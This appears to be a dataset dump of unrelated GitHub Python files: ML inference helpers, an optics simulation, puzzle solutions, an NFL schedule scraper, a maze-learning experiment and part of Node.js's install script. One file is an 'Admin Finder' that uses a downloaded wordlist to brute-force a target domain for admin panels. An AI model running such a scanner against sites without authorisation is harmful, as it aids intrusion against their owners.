nest_util.call_fn(partial(target_log_prob_fn), q_samples)\n\n divergence = tfp.vi.kl_reverse(target_log_prob - surrogate_posterior_log_prob)\n elbo = tf.reduce_mean(divergence, axis=0)\n return elbo\n\n# def trace_bnn(loss, grads, variables):\n# pbar.set_description('ELBO: %s' % str(loss.numpy()))\n# pbar.update()\n# return loss, tf.timestamp(), grads\n\ndef build_meanfield_advi(jd_list, observed_node=-1, distribution=tfd.Normal, reinterpreted_batch_ndims_node = 1, **kwargs):\n \"\"\"\n The inputted jointdistribution needs to be a batch version\n \"\"\"\n list_of_values = jd_list.sample(1) \n list_of_values.pop(observed_node) \n distlist = []\n for i, value in enumerate(list_of_values):\n dtype = value.dtype\n rv_shape = value[0].shape\n #print(rv_shape)\n loc = tf.Variable(tf.zeros(rv_shape), \n name='meanfield_%s_mu' % i,\n dtype=dtype)\n scale = tfp.util.TransformedVariable(tf.ones(rv_shape), tfb.Softplus(),\n name='meanfield_%s_scale' % i)\n \n approx_node = distribution(loc=loc,\n scale=scale,\n name='meanfield_%s' % i, **kwargs)\n \n if loc.shape == ():\n distlist.append(approx_node)\n else:\n distlist.append(\n tfd.Independent(approx_node, reinterpreted_batch_ndims=reinterpreted_batch_ndims_node)\n )\n\n meanfield_advi = tfd.JointDistributionSequential(distlist)\n return meanfield_advi\n\ndef trainable_normal_distribution(shape, name='', distribution=tfd.Normal, **kwargs):\n loc = tf.Variable(tf.zeros(shape), name='{}_loc'.format(name))\n scale = tfp.util.TransformedVariable(tf.Variable(tf.fill(shape,1.), name='{}_scale'.format(name)),\n bijector = tfb.Softplus())\n return distribution(loc, scale, name=name, **kwargs)\n","repo_name":"amirdib/quantized-variational-inference","sub_path":"qvi/core/vi.py","file_name":"vi.py","file_ext":"py","file_size_in_byte":9200,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"61"} +{"seq_id":"4051846312","text":"import OpticalInstruments as opi\nfrom PIL import Image\n\nprimary_mirror = opi.SphericalMirrror(-178)\nsecondary_mirror = opi.SphericalMirrror(57.15)\neyepiece = opi.ThinLens(40)#40\neye = opi.ThinLens(18.78, 1.337)\nthick_eyepiece = opi.ThickLens(1.5, 26, 80, 10)\ndeg_mirror = opi.PlaneMirror(45)\n\nsystem = [primary_mirror, secondary_mirror, deg_mirror, eyepiece]\n\nsystem_2 = [primary_mirror, secondary_mirror, deg_mirror, thick_eyepiece, eye]\ndist = [-59.7745, 2990, 960] #960\n\ncassegrain_telescope = opi.OpticalSystem(system, dist)\n\nobj_path = 'images/moon.png' #Path of the object\nresolution = 49.66 * 1e+6 #Pixel size in mm\nso = 384400 * 1e+6 #Distance to object\nsi = 18.78 * 1e-6 #Distance to image\nmax_angle = 0.04548328 # Max acceptation angle in radians\n\natten = 14\n#data = cassegrain_telescope.observe(obj_path, so, si, eye, resolution, atten)\n\n#Aberrated DATA\naberrated_data = cassegrain_telescope.observe(obj_path, so, si, eye, resolution, atten, max_angle)\n\n\n\n#We interpolate and visualize results\n#cassegrain_telescope.visualize_results('ouput/moon_out.png')\n\n#image.save('output/moon_out.png', format='PNG')\n\n\n\n\n\n\n\nprint(cassegrain_telescope.ABCD_matrix)\n","repo_name":"JuanHaunted/OpticalSystems","sub_path":"optpy/cassegrain_simplified.py","file_name":"cassegrain_simplified.py","file_ext":"py","file_size_in_byte":1164,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"61"} +{"seq_id":"23388852251","text":"#!/usr/bin/env python3\r\nfrom itertools import chain\r\nimport sys\r\n\r\nPROBLEM_LETTER = 'B'\r\nDIFFICULTY = sys.argv[1]\r\nINPUT_FILE = '{0}-{1}.in'.format(PROBLEM_LETTER, DIFFICULTY)\r\nOUTPUT_FILE = '{0}-{1}.out'.format(PROBLEM_LETTER, DIFFICULTY)\r\n\r\n\r\ndef equalSet(l):\r\n return len(set(l)) == 1\r\n\r\ndef allEqual(field):\r\n return len(set(chain(*field))) == 1\r\n\r\ndef solve(fin):\r\n rows, cols = tuple(int(s) for s in fin.readline().split())\r\n field = list(range(rows))\r\n for r in range(rows): field[r] = list(int(s) for s in fin.readline().split())\r\n\r\n wasRow, wasCol = [False] * rows, [False] * cols\r\n while True:\r\n if allEqual(field):\r\n return 'YES'\r\n foundEqual, rowNumber, colNumber = False, None, None\r\n for r in range(rows):\r\n if wasRow[r]: continue\r\n if equalSet(field[r]):\r\n foundEqual, rowNumber = True, r\r\n break\r\n if not foundEqual:\r\n for c in range(cols):\r\n if wasCol[c]: continue\r\n if equalSet([field[j][c] for j in range(rows)]):\r\n foundEqual, colNumber = True, c\r\n break\r\n if not foundEqual: break\r\n if rowNumber is not None:\r\n wasRow[rowNumber] = True\r\n for c in range(cols):\r\n maxElem = max(field[j][c] for j in range(rows))\r\n field[rowNumber][c] = maxElem\r\n else:\r\n wasCol[colNumber] = True\r\n for r in range(rows):\r\n maxElem = max(field[r])\r\n field[r][colNumber] = maxElem\r\n return 'NO'\r\n\r\nif __name__ == \"__main__\":\r\n fin = open(INPUT_FILE, 'r')\r\n fout = open(OUTPUT_FILE, 'w')\r\n\r\n testCount = int(fin.readline())\r\n for i in range(testCount):\r\n answer = solve(fin)\r\n fout.write('Case #{0}: {1}\\n'.format(i + 1, answer))\r\n\r\n fin.close()\r\n fout.close()","repo_name":"dr-dos-ok/Code_Jam_Webscraper","sub_path":"solutions_python/Problem_117/476.py","file_name":"476.py","file_ext":"py","file_size_in_byte":1909,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"73893282755","text":"\"\"\"\n18. Write a Python program to find palindromes in a given list of strings using Lambda.\nOrginal list of strings:\n['php', 'w3r', 'Python', 'abcd', 'Java', 'aaa']\nList of palindromes:\n['php', 'aaa']\n\"\"\"\nORIG_LIST = ['php', 'w3r', 'Python', 'abcd', 'Java', 'aaa']\n\n\nif __name__ == '__main__':\n print(list(filter(lambda s: s == s[::-1], ORIG_LIST)))\n","repo_name":"aoki-h-jp/playground","sub_path":"python-w3resource-exercises/python-lambda/018.py","file_name":"018.py","file_ext":"py","file_size_in_byte":353,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"23187500308","text":"import os\nos.environ.setdefault(\"DJANGO_SETTINGS_MODULE\",\"gamesProj.settings\")\n\nimport django\ndjango.setup()\nfrom fb_app.models import Games, Week, Teams, Season\nfrom django.db.models import Count\nimport urllib3\nfrom bs4 import BeautifulSoup\nimport urllib.request\nfrom datetime import datetime, timezone\nfrom selenium.webdriver import Chrome, ChromeOptions\nfrom selenium.webdriver.common.by import By\nfrom selenium.webdriver.support.ui import WebDriverWait\nfrom selenium.webdriver.support import expected_conditions as EC\nimport pytz\n\n\n\ndef load_sched(year):\n\n #changing weeks to load preseason weeks (make week 0 and cnt 1)\n if Week.objects.filter(current=True).exists():\n current_week = Week.objects.get(current=True)\n week_cnt = current_week.week + 1\n else:\n week_cnt = 1\n \n #week_cnt = current_week.week + 1\n season = Season.objects.get(current=True)\n while week_cnt < 5:\n try:\n week, created = Week.objects.get_or_create(season_model=season, week=week_cnt)\n #week.season = season.season\n if not week.current:\n week.current = False\n #week.current = True\n week.season = season.season\n #week.week = week_cnt\n week.game_cnt = 0\n week.save()\n\n if week_cnt > 17:\n url_week = 'post' + str(week_cnt - 17)\n else:\n url_week = 'reg' + str(week_cnt)\n\n\n #url = \"https://www.nfl.com/schedules/2020/\" + str(week_cnt) + \"/\"\n url = \"https://www.nfl.com/schedules/\" + str(season.season) + \"/\" + url_week + \"/\"\n print (url)\n\n game_dict = {}\n options = ChromeOptions()\n options.add_argument(\"--headless\")\n options.add_argument(\"--disable-gpu\")\n\n\n driver = Chrome(options=options)\n \n driver.get(url)\n #sleep.sleep(10)\n #g = driver.find_elements_by_class_name(\"nfl-c-matchup-strip__left-area\")\n main = driver.find_element_by_id(\"main-content\")\n for section in main.find_elements_by_class_name('nfl-o-matchup-group'):\n date_t = section.find_element_by_class_name('d3-o-section-title').text.split(',')[1].lstrip()\n month = date_t.split(' ')[0]\n day = date_t.split(' ')[1].strip('TH').strip('ND').strip('ST').strip('RD')\n game_dow = section.find_element_by_class_name('d3-o-section-title').text.split(',')[0]\n #fix the year for Jan games\n print ('month', month, len(month))\n if month in ['JANUARY', 'FEBRUARY']:\n year = int(season.season) + 1\n else:\n year = season.season\n web_game_date = (str(month) + ' ' + str(day) + ', ' + str(year))\n\n for game_info in section.find_elements_by_class_name('nfl-c-matchup-strip__left-area'):\n teams = game_info.find_elements_by_class_name('nfl-c-matchup-strip__team-fullname')\n \n away = Teams.objects.get(long_name=(teams[0].get_attribute('innerHTML').lstrip().rstrip()))\n home = Teams.objects.get(long_name=(teams[1].get_attribute('innerHTML').lstrip().rstrip()))\n game_time = game_info.find_element_by_css_selector('p.nfl-c-matchup-strip__date-info')\n print ('--------------')\n print (game_time.text)\n print ('--------------')\n #tz = game_info.find_element_by_class_name('nfl-c-matchup-strip__date=timezone')\n print ('GI', game_info.text.split(' ')[1][3:])\n print ('GI', game_info.text.split(' ')[2])\n print ('GI', game_info.text.split(' ')[3])\n tz = game_time.text.split(' ')[1][3] + game_time.text.split(' ')[2][0] + game_time.text.split(' ')[3][0]\n print ('tz', tz)\n \n print ('teams ', home, away)\n #print (len(game_time.text), game_time.text)\n\n game, created = Games.objects.get_or_create(week=week, home=home, away=away)\n game.week = week\n game.eid = str (season.season) + str(week) + str(home) + str(away)\n game.away = away\n game.home = home\n game_time = game_time.text.split(' ')[0] + ' ' + game_time.text.split(' ')[1][:2] \n print ('game tiem', game_time)\n\n\n\n if tz == 'JST':\n jst = pytz.timezone('Asia/Tokyo')\n orig_time = jst.localize(datetime.strptime(web_game_date + ' ' + game_time, '%B %d, %Y %I:%M %p'))\n web_time = orig_time.astimezone(pytz.utc)\n #elif tz == 'UST':\n # ust = pytz.timezone('America/New_York')\n # orig_time = ust.localize(datetime.strptime(web_game_date + ' ' + game_time, '%B %d, %Y %H:%M %p'))\n # web_time = orig_time.astimezone(pytz.utc)\n else:\n print ('in time else')\n utc = pytz.timezone('UTC')\n #web_time = datetime.strptime(web_game_date + ' ' + game_time, '%B %d, %Y %H:%M %p')\n web_time = utc.localize(datetime.strptime(web_game_date + ' ' + game_time, '%B %d, %Y %I:%M %p'))\n \n game.game_time = web_time\n game.day = game_dow\n game.qtr = 'pregame'\n\n game.save()\n\n week.game_cnt = Games.objects.filter(week=week).count()\n week.save()\n \n except Exception as e:\n print ('exception with scrape', e)\n finally:\n week_cnt +=1\n driver.quit()\n\nif __name__ == '__main__':\n print ('populating script!')\n #clean_db()\n load_sched(2021)\n print (\"Populating Complete!\")\n #curr_week = Week.objects.get(current=True)\n #print (Games.objects.filter(week__season_model__current=True, week__week__gt=curr_week.week).values('week__week').annotate(Count('week')))\n print (Games.objects.filter(week__season_model__current=True).values('week__week').annotate(Count('week')))\n\n","repo_name":"jflynn87/games","sub_path":"load_nfl_sched.py","file_name":"load_nfl_sched.py","file_ext":"py","file_size_in_byte":6755,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"11475060144","text":"import sys\nimport os\nsys.path.append(os.getcwd())\n\nimport numpy as np\nimport matplotlib.pyplot as plt\nimport time as dt\nfrom backend.maze import Navex\nimport multiprocessing as mp\nfrom functools import partial\nfrom backend.model import ResACAgent\nfrom backend.utils import saveload, save_rdyn, get_default_hp, plot_1pa_maps_dmp, get_savings\n\n\ndef singlepa_script(hp, pool):\n exptname = hp['exptname']\n btstp = hp['btstp']\n\n print(exptname)\n trsess = hp['trsess'] # number of training trials per cue, location\n epochs = hp['epochs'] # number of epochs to go through all cue-location combination\n\n # store performance\n totlat = np.zeros([btstp, epochs, trsess])\n totdgr = np.zeros([btstp, epochs])\n totpath = np.zeros([btstp,epochs, int(hp['probetime'] * (1000 // hp['tstep'])+1),2])\n\n x = pool.map(partial(sym_singleloc_expt, hp), np.arange(btstp))\n\n # Start experiment\n for b in range(btstp):\n totlat[b], totdgr[b], totpath[b], pweights, alldyn = x[b]\n\n totlat[totlat == 0] = np.nan\n\n plt.figure(figsize=(15, 8))\n plt.rcParams.update({'font.size': 8})\n plt.gcf().text(0.01, 0.01, exptname, fontsize=10)\n ax1 = plt.subplot2grid((6, 9), (0, 0), colspan=4, rowspan=2)\n plt.ylabel('Latency (s)')\n totlat *= hp['tstep']/1000\n #plt.title('Latency, {} trials'.format(trsess))\n plt.errorbar(x=np.arange(epochs*trsess),y=np.mean(totlat,axis=0).reshape(-1),\n yerr=np.std(totlat,axis=0).reshape(-1)/np.sqrt(btstp), marker='o', color='k', elinewidth=0.5, markersize=5)\n\n ax2 = plt.subplot2grid((6, 9),(0, 5), colspan=4, rowspan=2)\n plt.ylabel('Visit Ratio per Epoch')\n dgrmean = np.mean(totdgr, axis=0)\n dgrstd = np.std(totdgr, axis=0)\n plt.errorbar(x=np.arange(epochs), y=dgrmean, yerr=dgrstd/np.sqrt(btstp), color='k')\n md, _ = np.polyfit(x=np.arange(epochs), y=dgrmean, deg=1)\n plt.legend(['VrG {:.2g}'.format(md)],loc=2)\n ax3 = plt.twinx()\n savingsm, savingss = get_savings(totlat)\n ms,_ = np.polyfit(x=np.arange(epochs),y=savingsm,deg=1)\n ax3.errorbar(x=np.arange(epochs),y=savingsm, yerr=savingss/np.sqrt(btstp), color='g')\n ax3.set_ylabel('Savings')\n ax3.legend(['SavG {:.2g}'.format(ms)],loc=1)\n\n mvpath = totpath[0]\n #midx = np.linspace(0,epochs-1,3,dtype=int)\n for i in range(hp['epochs']):\n plt.subplot(6,9,i+19)\n\n rloc = mvpath[i, -1]\n plt.ylabel('PT{}, R{}'.format(i+1, rloc))\n plt.plot(mvpath[i,:-1,0],mvpath[i,:-1,1],'k')\n plt.axis([-0.8,0.8,-0.8,0.8])\n plt.gca().set_aspect('equal', adjustable='box')\n circle = plt.Circle(rloc, 0.03, color='r')\n plt.gcf().gca().add_artist(circle)\n plt.xticks([])\n plt.yticks([])\n\n env = Navex(hp)\n env.make()\n agent = ResACAgent(hp=hp)\n\n # plot weights\n if hp['hidtype'] == 'classic':\n xx, yy = np.meshgrid(np.arange(hp['npc']), np.arange(hp['npc']))\n for i in range(hp['epochs']):\n ax = plt.subplot(6, 9, i + 28)\n actorw = pweights[i][2][:hp['npc'] ** 2].numpy()\n actorpol = np.matmul(agent.actor.aj, actorw.T)\n criticw = pweights[i][1][:, 0][:hp['npc'] ** 2].numpy()\n im = plt.imshow(criticw.reshape(hp['npc'], hp['npc']))\n plt.title('C {}'.format(np.round([np.max(criticw), np.min(criticw)], 1)))\n plt.xlabel('A {}'.format(np.round([np.max(actorw), np.min(actorw)], 1)))\n plt.colorbar(im,fraction=0.046, pad=0.04,ax=ax)\n plt.quiver(xx.reshape(-1), yy.reshape(-1), actorpol[0], actorpol[1], color='w')\n plt.xticks([])\n plt.yticks([])\n else:\n plot_1pa_maps_dmp(alldyn, mvpath, hp, pweights, pltidx=[6, 9, 28])\n\n # plt.subplot(prow, 9, 4)\n # plt.imshow(pweights[0][-1],aspect='auto')\n # plt.colorbar()\n # plt.title('Mem Weights')\n\n # plot rho\n sess = list(alldyn[1].keys())\n labels = ['rho', 'goal']\n ridx = [1,3]\n for d in range(2):\n for i in range(hp['epochs']):\n plt.subplot(6, 9, i + 37 + 9*d)\n if i == 0:\n plt.ylabel(labels[d])\n dyn = np.array(alldyn[ridx[d]][sess[i]])\n if d == 1:\n plt.axhline(y=hp['omite'], color='r', linestyle='--')\n plt.plot(dyn)\n else:\n plt.imshow(dyn.T, aspect='auto') # [:hitr[i,pidx[i]]]\n plt.colorbar()\n\n plt.show()\n\n if hp['savefig']:\n plt.savefig('./Fig/fig_{:.2g}s_{:.2g}d_{}.png'.format(ms,md, exptname))\n if hp['savegenvar']:\n saveload('save', './Data/genvars_{:.2g}s_{:.2g}d_{}_b{}_{}'.format(ms, md, exptname, btstp, dt.time()), [totlat, totdgr, totpath])\n\n return totlat, totdgr, mvpath, pweights, alldyn\n\n\ndef sym_singleloc_expt(hp,b):\n print('Agent {} started training ...'.format(b))\n exptname = hp['exptname']\n print(exptname)\n\n # create environment\n env = Navex(hp)\n\n trsess = hp['trsess']\n epochs = hp['epochs']\n\n # Create nonrewarded probe trial index\n\n # store performance\n lat = np.zeros([epochs, trsess])\n dgr = np.zeros([epochs])\n totpath = np.zeros([epochs, env.normax + 1, 2])\n alldyn = [{}, {}, {}, {}]\n pweights = []\n\n # Start experiment\n start = dt.time()\n agent = ResACAgent(hp=hp)\n mdlw = None\n\n # start training\n for e in range(epochs):\n\n env.make(noreward=[hp['trsess']])\n rlocs = env.rlocs\n if b == 0:\n print('All Rlocs in Epoch {}: {}'.format(e, rlocs))\n\n lat[e], dgr[e], mdlw, totpath[e] = run_sym_1rloc_expt(e, b, env, hp, agent, trsess, alldyn, useweight=mdlw)\n pweights.append(mdlw)\n\n if hp['savevar']:\n saveload('save', './Data/vars_{}_{}'.format(exptname, dt.monotonic()), [alldyn,pweights, totpath, lat, dgr])\n\n print('---------------- Agent {} done in {:3.2f} min ---------------'.format(b, (dt.time() - start) / 60))\n\n return lat, dgr, totpath, pweights, alldyn\n\n\ndef run_sym_1rloc_expt(e, b, env, hp, agent, sessions, alldyn, useweight=None, noreward=None):\n lat = np.zeros(sessions)\n dgr = []\n\n if useweight:\n agent.set_weights(useweight)\n\n for t in range(sessions*len(env.rlocs)):\n # Reset environment, actor dynamics\n state, cue, reward, done = env.reset(trial=t)\n agent.state_reset()\n trackg = []\n while not done:\n\n # Plasticity switched off when trials are non-rewarded & during cue presentation (60s)\n if t in env.nort or t in env.noct:\n plasticity = False\n else:\n plasticity = True\n\n cpc, cue, rfr = agent.see(state=state, cue=cue, startbox=env.startbox)\n\n value, xy, goal, mem = agent.estimate_value_position_goal_memory_td(cpc=cpc,cue=cue,rfr=rfr)\n\n tderr, tdxy = agent.learn(reward=reward, self_motion=env.dtxy, cpc=cpc, cue=cue, rfr=rfr, xy=xy, goal=goal,\n plasticity=plasticity)\n\n action, rho = agent.get_action(rfr=rfr, xy=xy, goal=goal)\n\n # Use action on environment, ds4r: distance from reward\n state, cue, reward, done, ds4r = env.step(action)\n\n # save lsm & actor dynamics for analysis\n if t in env.nort:\n #save_rdyn(alldyn[0], 'dmp', e, env.startpos, env.cue, rfr)\n save_rdyn(alldyn[1], 'dmp', e, env.startpos, env.cue, rho)\n save_rdyn(alldyn[2], 'dmp', e, env.startpos, env.cue, np.concatenate([value, tderr],axis=1))\n save_rdyn(alldyn[3], 'dmp', e, env.startpos, env.cue, goal)\n trackg.append(goal)\n\n if done:\n env.render()\n break\n\n if env.probe:\n dgr = env.dgr\n mvpath = np.concatenate([np.array(env.tracks[:env.normax]),env.rloc[None,:]],axis=0)\n else:\n lat[t] = env.i\n\n if hp['platform'] == 'laptop' or b == 0:\n # Trial information\n print('{} | D {:4.3f} | S {} | Dgr {} | {} as | g {} | xy{}'.format(\n t, ds4r, env.i // (1000 // env.tstep), env.dgr,\n np.round(np.mean(agent.actor.avgspeed),3), np.round(goal,2),\n np.round(xy.numpy()[0],2)))\n\n mdlw = agent.get_weights()\n if hp['platform'] == 'laptop' or b == 0:\n print('Coord max {:.3g}, min {:.3g}'.format(np.max(mdlw[0]), np.min(mdlw[0])))\n print('Critic max {:.3g}, min {:.3g}'.format(np.max(mdlw[1]), np.min(mdlw[1])))\n print('Actor max {:.3g}, min {:.3g}'.format(np.max(mdlw[2]), np.min(mdlw[2])))\n print('Goal max {:.3g}, min {:.3g}'.format(np.max(mdlw[5]), np.min(mdlw[5])))\n\n return lat, dgr, mdlw, mvpath\n\n\nif __name__ == '__main__':\n\n hp = get_default_hp(task='dmp',platform='server')\n\n hp['btstp'] = 24\n hp['savefig'] = True\n hp['savegenvar'] = True\n hp['savevar'] = False\n\n ''' agent param '''\n hp['clr'] = 0.0002\n hp['taug'] = 3000\n hp['alr'] = 0.00005\n\n hp['usenmc'] = True # confi, neural\n\n hp['stochlearn'] = True\n\n ''' env param'''\n hp['Rval'] = 5\n hp['render'] = False # visualise movement trial by trial\n\n allcb = [1]\n\n pool = mp.Pool(processes=hp['cpucount'])\n\n for cb in allcb:\n hp['contbeta'] = cb\n\n hp['exptname'] = 'dmp_res_{}cb_{}glr_{}sl_{}ach_{}clr_{}tg_{}alr_{}R_{}dt_b{}_{}'.format(\n hp['contbeta'], hp['glr'], hp['stochlearn'],hp['ach'], hp['clr'], hp['taug'],hp['alr'],\n hp['Rval'], hp['tstep'], hp['btstp'], dt.monotonic())\n\n totlat, totdgr, mvpath, pw, alldyn = singlepa_script(hp, pool)\n\n pool.close()\n pool.join()","repo_name":"mgkumar138/schema4one","sub_path":"dmp/dmp_res.py","file_name":"dmp_res.py","file_ext":"py","file_size_in_byte":9630,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"61"} +{"seq_id":"74928731394","text":"import requests, os, sys\nfrom requests.exceptions import ConnectionError\nfrom colorama import Fore\n\n\nversion = \"1.0\"\nprogram_name = sys.argv[0]\n#domain = sys.argv[1]\nlem = len(sys.argv)\nresult = 'result-scan-admin.txt'\n\ng = Fore.GREEN\nr = Fore.RED\nreset = Fore.RESET\n\nusage = (f\"usage : python3 {program_name} \")\nbanner = (f\"\"\"\n ;::::; \n ;::::; :; \n ;:::::' :; \n ;:::::; ;. \n ,:::::' ; OOO \n ::::::; ; OOOOO \n ;:::::; ; OOOOOOOO \n ,;::::::; ;' / OOOOOOO \n ;:::::::::`. ,,,;. / / DOOOOOO \n .';:::::::::::::::::;, / / DOOOO \n ,::::::;::::::;;;;::::;, / / DOOO \n;`::::::`'::::::;;;::::: ,#/ / DOOO \n:`:::::::`;::::::;;::: ;::# / DOOO\n::`:::::::`;:::::::: ;::::# / DOO\n`:`:::::::`;:::::: ;::::::#/ DOO\n :::`:::::::`;; ;:::::::::## OO\n ::::`:::::::`;::::::::;:::# OO\n `:::::`::::::::::::;'`:;::# O \n `:::::`::::::::;' / / `:# \n ::::::`:::::;' / / `#\n\n{r}The Angel Of Death {reset}- {g}Admin Finder{reset}\nVersion : {version}\n{usage}\"\"\")\n\n\ndef admin_checker():\n\tif lem != 2:\n\t\tprint(banner)\n\t\tsys.exit(0)\n\n\telse:\n\t\tdomain = sys.argv[1]\n\t\tget_wordlist = \"https://fooster1337.github.io/assets/wordlist.txt\"\n\t\tword = requests.get(get_wordlist)\n\t\tget_word = word.content.decode('utf-8')\n\t\tgetStatus = requests.get(domain)\n\t\tgetCode = getStatus.status_code\n\t\t#print(getCode)\n\t\tif getCode == 200:\n\t\t\tprint(f\"Scanning : {domain}\")\n\t\t\tprint(f\"Result save on {result}\")\n\t\t\tfor i in get_word.splitlines():\n\t\t\t\tdom_pls = (f\"{domain}/{i}\")\n\t\t\t\trq = requests.get(dom_pls)\n\t\t\t\treq = rq.status_code\n\t\t\t\t#print(f\"{req} -> {dom_pls}\")\n\t\t\t\tif req == 200:\n\t\t\t\t\tprint(f\"{g}[Found!] {reset}-> {dom_pls} [{g}{req}{reset}]\")\n\t\t\t\t\twith open(result, 'a') as f:\n\t\t\t\t\t\tf.write(dom_pls)\n\t\t\t\t\t\tf.write(\"\\n\")\n\t\t\t\t\tf.close()\n\t\t\t\telif req != 200:\n\t\t\t\t\tprint(f\"{r}[NoLuck] {reset}-> {dom_pls} [{r}{req}{reset}]\")\n\t\telif getCode != 200:\n\t\t\tprint(f\"Unknown Error : {getCode}\\n{usage}\")\n\t\t\tsys.exit(0)\n\nif __name__ == \"__main__\":\n\ttry:\n\t\tadmin_checker()\n\texcept ConnectionError as E:\n\t\tprint(f\"unable to catch {domain}\\n{usage}\")\n\texcept KeyboardInterrupt:\n\t\tprint(f\"\\n{r}Exit...{reset}\")\n\t\tsys.exit(0)\n\texcept ModuleNotFoundError:\n\t\tos.system(\"pip3 install requests && pip3 install colorama\")\n\t\tadmin_checker()","repo_name":"fooster1337/admin-finder","sub_path":"finder.py","file_name":"finder.py","file_ext":"py","file_size_in_byte":2571,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"7497483446","text":"#!/usr/bin/env python\n\nfrom __future__ import print_function\n\nimport ast\nimport errno\nimport os\nimport shutil\nimport sys\nimport re\n\n# set at init time\nnode_prefix = '/usr/local' # PREFIX variable from Makefile\ninstall_path = '' # base target directory (DESTDIR + PREFIX from Makefile)\ntarget_defaults = None\nvariables = None\n\ndef abspath(*args):\n path = os.path.join(*args)\n return os.path.abspath(path)\n\ndef load_config():\n with open('config.gypi') as f:\n return ast.literal_eval(f.read())\n\ndef try_unlink(path):\n try:\n os.unlink(path)\n except OSError as e:\n if e.errno != errno.ENOENT: raise\n\ndef try_symlink(source_path, link_path):\n print('symlinking %s -> %s' % (source_path, link_path))\n try_unlink(link_path)\n try_mkdir_r(os.path.dirname(link_path))\n os.symlink(source_path, link_path)\n\ndef try_mkdir_r(path):\n try:\n os.makedirs(path)\n except OSError as e:\n if e.errno != errno.EEXIST: raise\n\ndef try_rmdir_r(path):\n path = abspath(path)\n while path.startswith(install_path):\n try:\n os.rmdir(path)\n except OSError as e:\n if e.errno == errno.ENOTEMPTY: return\n if e.errno == errno.ENOENT: return\n raise\n path = abspath(path, '..')\n\ndef mkpaths(path, dst):\n if dst.endswith('/'):\n target_path = abspath(install_path, dst, os.path.basename(path))\n else:\n target_path = abspath(install_path, dst)\n return path, target_path\n\ndef try_copy(path, dst):\n source_path, target_path = mkpaths(path, dst)\n print('installing %s' % target_path)\n try_mkdir_r(os.path.dirname(target_path))\n try_unlink(target_path) # prevent ETXTBSY errors\n return shutil.copy2(source_path, target_path)\n\ndef try_remove(path, dst):\n source_path, target_path = mkpaths(path, dst)\n print('removing %s' % target_path)\n try_unlink(target_path)\n try_rmdir_r(os.path.dirname(target_path))\n\ndef install(paths, dst):\n for path in paths:\n try_copy(path, dst)\n\ndef uninstall(paths, dst):\n for path in paths:\n try_remove(path, dst)\n\ndef package_files(action, name, bins):\n target_path = 'lib/node_modules/' + name + '/'\n\n # don't install npm if the target path is a symlink, it probably means\n # that a dev version of npm is installed there\n if os.path.islink(abspath(install_path, target_path)): return\n\n # npm has a *lot* of files and it'd be a pain to maintain a fixed list here\n # so we walk its source directory instead...\n root = 'deps/' + name\n for dirname, subdirs, basenames in os.walk(root, topdown=True):\n subdirs[:] = [subdir for subdir in subdirs if subdir != 'test']\n paths = [os.path.join(dirname, basename) for basename in basenames]\n action(paths, target_path + dirname[len(root) + 1:] + '/')\n\n # create/remove symlinks\n for bin_name, bin_target in bins.items():\n link_path = abspath(install_path, 'bin/' + bin_name)\n if action == uninstall:\n action([link_path], 'bin/' + bin_name)\n elif action == install:\n try_symlink('../lib/node_modules/' + name + '/' + bin_target, link_path)\n else:\n assert 0 # unhandled action type\n\ndef npm_files(action):\n package_files(action, 'npm', {\n 'npm': 'bin/npm-cli.js',\n 'npx': 'bin/npx-cli.js',\n })\n\ndef corepack_files(action):\n package_files(action, 'corepack', {\n 'corepack': 'dist/corepack.js',\n# Not the default just yet:\n# 'yarn': 'dist/yarn.js',\n# 'yarnpkg': 'dist/yarn.js',\n# 'pnpm': 'dist/pnpm.js',\n# 'pnpx': 'dist/pnpx.js',\n })\n\n # On z/OS, we install node-gyp for convenience, as some vendors don't have\n # external access and may want to build native addons.\n if sys.platform == 'zos':\n link_path = abspath(install_path, 'bin/node-gyp')\n if action == uninstall:\n action([link_path], 'bin/node-gyp')\n elif action == install:\n try_symlink('../lib/node_modules/npm/node_modules/node-gyp/bin/node-gyp.js', link_path)\n else:\n assert 0 # unhandled action type\n\ndef subdir_files(path, dest, action):\n ret = {}\n for dirpath, dirnames, filenames in os.walk(path):\n files_in_path = [dirpath + '/' + f for f in filenames if f.endswith('.h')]\n ret[dest + dirpath.replace(path, '')] = files_in_path\n for subdir, files_in_path in ret.items():\n action(files_in_path, subdir + '/')\n\ndef files(action):\n is_windows = sys.platform == 'win32'\n output_file = 'node'\n output_prefix = 'out/Release/'\n\n if is_windows:\n output_file += '.exe'\n action([output_prefix + output_file], 'bin/' + output_file)\n\n if 'true' == variables.get('node_shared'):\n if is_windows:\n action([output_prefix + 'libnode.dll'], 'bin/libnode.dll')\n action([output_prefix + 'libnode.lib'], 'lib/libnode.lib')\n elif sys.platform == 'zos':\n # GYP will output to lib.target; see _InstallableTargetInstallPath\n # function in tools/gyp/pylib/gyp/generator/make.py\n output_prefix += 'lib.target/'\n\n output_lib = 'libnode.' + variables.get('shlib_suffix')\n action([output_prefix + output_lib], 'lib/' + output_lib)\n\n # create libnode.x that references libnode.so (C++ addons compat)\n os.system(os.path.dirname(os.path.realpath(__file__)) +\n '/zos/modifysidedeck.sh ' +\n abspath(install_path, 'lib/' + output_lib) + ' ' +\n abspath(install_path, 'lib/libnode.x') + ' libnode.so')\n\n # install libnode.version.so\n so_name = 'libnode.' + re.sub(r'\\.x$', '.so', variables.get('shlib_suffix'))\n action([output_prefix + so_name], variables.get('libdir') + '/' + so_name)\n\n # create symlink of libnode.so -> libnode.version.so (C++ addons compat)\n link_path = abspath(install_path, 'lib/libnode.so')\n try_symlink(so_name, link_path)\n else:\n output_lib = 'libnode.' + variables.get('shlib_suffix')\n action([output_prefix + output_lib], variables.get('libdir') + '/' + output_lib)\n\n action(['deps/v8/tools/gdbinit'], 'share/doc/node/')\n action(['deps/v8/tools/lldb_commands.py'], 'share/doc/node/')\n\n if 'freebsd' in sys.platform or 'openbsd' in sys.platform:\n action(['doc/node.1'], 'man/man1/')\n else:\n action(['doc/node.1'], 'share/man/man1/')\n\n if 'true' == variables.get('node_install_npm'):\n 